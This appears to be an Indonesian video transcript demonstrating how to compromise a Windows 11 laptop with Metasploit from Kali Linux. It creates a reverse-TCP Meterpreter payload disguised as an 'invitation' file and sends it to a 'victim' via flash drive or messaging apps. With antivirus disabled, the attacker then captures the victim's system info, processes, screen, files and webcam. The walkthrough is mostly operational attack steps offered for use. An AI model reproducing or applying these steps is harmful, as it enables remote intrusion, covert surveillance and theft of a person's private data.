Oke, selamat pagi, selamat siang, selamat sore, selamat malam. Kali ini saya akan mempraktekkan metode eksploitasi Windows 11 menggunakan Kali Linux. Pertama, siapkan dua device atau dua perangkat laptop dengan menggunakan jaringan yang sama. Nah, kedua, siapkan Kali Linux di VirtualBox, lalu setting networknya ke bridge. Nah, terus jika ingin mengirim file eksploitasi ini lewat flash disk, maka ikuti langkah berikut. Eh, Pergi ke USB dan tambahkan nama USB yang dipakai. Nah, maksudnya USB itu flash disk ya. Terus opsi ini opsi opsional karena mengirim datanya bisa beragam lewat mana saja. Saya akan mempraktekkan lewat flash disk, langsung kita jalankan saja. Kita login. Terus langsung langsung aja langsung aja masuk ke terminal Kali Linux, lalu kita menginstal terlebih dahulu Metasploit-nya dengan perintah sudo apt update dan sudo apt install Metasploit framework. Nah, untuk mengeceknya kita bisa menggunakan MS Console. Setiap kali menggunakan MS Console, outputnya akan berbeda, tetapi jika keluarnya mirip tampilannya seperti ini, berarti kita sudah terinstall. Kita buka terminal satu lagi untuk mengecek IP dari Kali Linux yang saya pakai dengan perintah ifconfig. Kita mengambil IP-nya dari sini ya, dari ETH1. Saya copy pastekan saja, dan ingat tiap IP yang kita pakai berapa beberapa berapa dan aja IP yang kita pakai 192 168 040. Nah, kita balik lagi ke terminal sebelumnya. Saya buat file Metasploit dengan menggunakan perintah msf venom min p windows garis miring meterpreter garis miring reverse tcp lhost. Itu berapa IP yang tadi kita pakai. Langsung aja kita buat airportnya 444 nih, 4 kali. Terus buat paling pojok kanannya itu exploit.exe, kita bisa rubah namanya apa aja. Contoh aja kita memakai nama undangan. Nah, kita enter saja. Nah, setelah file tersebut telah dibuat, kita pergi ke file system, terus kita ke Kali, terus bakal ada file yang kita telah buat. Nah, langkah berikutnya kita harus kirimkan file tersebut ke laptop korban, entah bisa lewat mana saja antara Google Drive, WhatsApp, Telegram, dan lain-lain. Tapi kali ini saya mempraktekannya menggunakan flash disk. Saya akan mengirimkan file tersebut ke korban. Pertama kita colokkan terlebih dahulu file disknya, lalu kita copy pastekan saja file tersebut ke dalam file disk. Nah, kita bisa close saja foldernya, file sistemnya.
Terus kita masuk ke terminalnya lagi, ketikkan use exploit multi handler, maaf, kita masukkan perintah mms console terlebih dahulu, lalu kita ketikkan use exploit multi handler, lalu kita ketikkan set pilot Windows interpreter reverse TCP seperti teks yang ada di video. Oke, terus kita juga set lhost dan lportnya. Lhost terlebih dahulu, set lhost, masukkan IP kalian, terus set lport 444, lalu exploit. Nah, sehabis ini kita tinggal menunggu korban membuka file yang kita telah buat tadi. Nah, oke, kita beralih ke device korban. Oke, setelah kita beralih ke device korban alias Windows 11 nya, kebetulan device teman saya bernama Jaran. Sebelum kita memasukkan flash disknya di sini, langkah pertama kita matikan terlebih dahulu Windows Security-nya. Nah, kita cari aja Windows Security, terus cari manage setting, kita off-kan semua opsi yang ada. Oke, setelah itu kita pergi ke file disk kita cari yang file yang telah kita buat. Oke, langsung klik 2 kali saja. Nah, Kali Linux akan merespons secara otomatis kita ke device pelaku alias Kali Linux-nya. Nah, akan jadi seperti ini. Seperti kita sudah berhasil untuk mengeksploitasi Windows 11. Nah, kita bisa melakukan banyak perintah. Contoh saja yang kita lihat sistem korban. Ketika sysinfo, lalu kita enter saja, maka sistem korban akan terlihat. Kita cek apakah benar sistemnya seperti ini. Bisa kita lihat hasil dari sistemnya. Nah, kita ke device bukan berikutnya, tapi ke device korban. Kita lihat, kita cek apakah benar sistemnya seperti ini. Oke, kita cek di device Windows-nya, pergi pengaturan dan cari sistem, lalu paling bawah bagian about, sama ya seperti yang kita cek tadi. Nah, oke, kita ke Kali Linux-nya lagi. Kita bisa melihat proses berjalan pada laptop korban dengan perintah ps. Kita bisa dilihat sendiri prosesnya berjalan apa saja ketika ketikkan saja. Nah, kita bisa lihat sendiri ya. Oke, kita juga bisa melihat tampilan dari laptop korban. Dia sedang membuka apa saja. Kita bisa lihat menggunakan perintah screenshot untuk mengambil screenshot dari tampilan layar korban. Nah, kita ketikkan saja. Nah, ketika kita seperti ini, send timeout, kita langsung ke device korbannya lagi, lalu ketikkan file yang kita telah buat tadi. Karena ini berbatas waktu juga, jadi ketikkan lagi aja, klik 2 kali file tersebut, kita ke device korban. Kita close saja semuanya. Kita pengen screenshot tampilan layar ini. Nah, terus kita beralih lagi ke korban, bukan ke pelaku alias Kali Linux. Nah, kita ketikkan lagi screenshot. Oke. Maka ketika kita sudah mengetikkan, maka akan muncul
file di mana file tersebut berada, file foto tersebut, karena ini akan menampilkan layar yang akan tampil yang dilihat korban. Nah, terus kita masuk ke filenya aja dan testing file di file system. Maaf, di bagian kali. Terus, nah, situ ada tuh fotonya dengan nama yang random. Oke, lalu ini hasilnya. Oke. Terus lalu kita bisa mencoba untuk melihat file di laptop korban dengan perintah ls. Ini folder yang kita buka tadi ya di flash disk. Kita coba. Nah, ini kan tadi ya. Terus kita coba bisa cd d juga. Nah, ini bisa melihat. Terus kita ls. Nah, ini bisa melihat semua file yang ada di korban. Ya, kita bisa buktikan aja. Kita pergi ke file .d nya. Nah, sama kan? Oke. Terus kita beralih lagi ke pelaku alias Kali Linux. Nah, ini bisa mengambil kamera dari korban dengan perintah webcam snap. Nah, karena laptop korban mati, jadi tampilannya seperti ini. Oke, sebenarnya ada perintah lagi untuk menemukan shell Windows dari korban dengan perintah shell. Kali ini saya nggak mempraktekannya. Oke, sebenarnya masih banyak lagi perintah-perintahnya. Oke, sekian dari saya, kurang-kurangnya mohon maaf. Wabillahi taufiq wal hidayah. Wassalamualaikum warahmatullahi wabarakatuh.